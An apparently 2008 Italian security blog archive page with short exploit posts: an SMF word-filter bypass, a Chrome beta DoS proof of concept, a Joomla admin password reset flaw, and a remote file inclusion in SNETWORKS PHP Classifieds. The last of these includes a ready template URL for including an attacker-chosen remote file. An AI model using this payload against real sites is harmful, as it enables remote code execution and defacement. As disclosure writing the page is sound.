E’ stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione 1.1.6 di Simple Machine Forum (o SMF) che permette di bypassare il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc.
Archive | Exploit RSS feed for this section
[EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 – RFI
4 ottobre 2008
Oggi facendo il mio lavoro sono incappato in un sito con installato lo script “SNETWORKS PHP CLASSIFIEDS” constatando che è vulnerabile a diversi tipi di hacking.
Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:
http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?
[EXPLOIT] Google Chrome Browser – Milw0rm
25 settembre 2008
Vi segnalo un’exploit che è stato pubblicato oggi sull’autorevole sito Milw0rm riguado il noto Browser Google Chrome che, tengo a precisare, è ancora in versione Beta.
Tale Exploit è un DoS PoC (Proof Of Concept) che sfruttando la funzione “alert” del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome in pochi secondi causando un crash dell’applicativo. Ricorda come realizzazione quei JavaScript che venivano utilizzati forse 10 anni fa per far crashare i Browser (o in certi casi il Pc) generando un loop di apertura di PopUp.
Per chi volesse testarlo sulla propria pelle ecco l’Exploit versione Html e, successivamente, compresso con WinRar (non vorrei farvi crashare i PC
):
Exploit Google Chrome – Milw0rm 6554
Ed eccovi alcuni screenshot del TaskManager di Chrome durante le prove.
Dopo 15 secondi la situazione era questa:
[EXPLOIT] Joomla 1.5.x Remote Admin Password Change
14 settembre 2008
In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente “com_user” per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l’accesso Admin per eseguire defacement e simili.
Al link seguente troverete l’annuncio ufficiale:
http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html
Questo, invece, quello dal Sito Italiano:

![Google Chrome Normal Activity - TaskManager [EXPLOIT] Google Chrome Browser Milw0rm](http://www.capn3m0.org/wp-content/uploads/2008/09/3-300x192.jpg)

5 ottobre 2008
0 Comments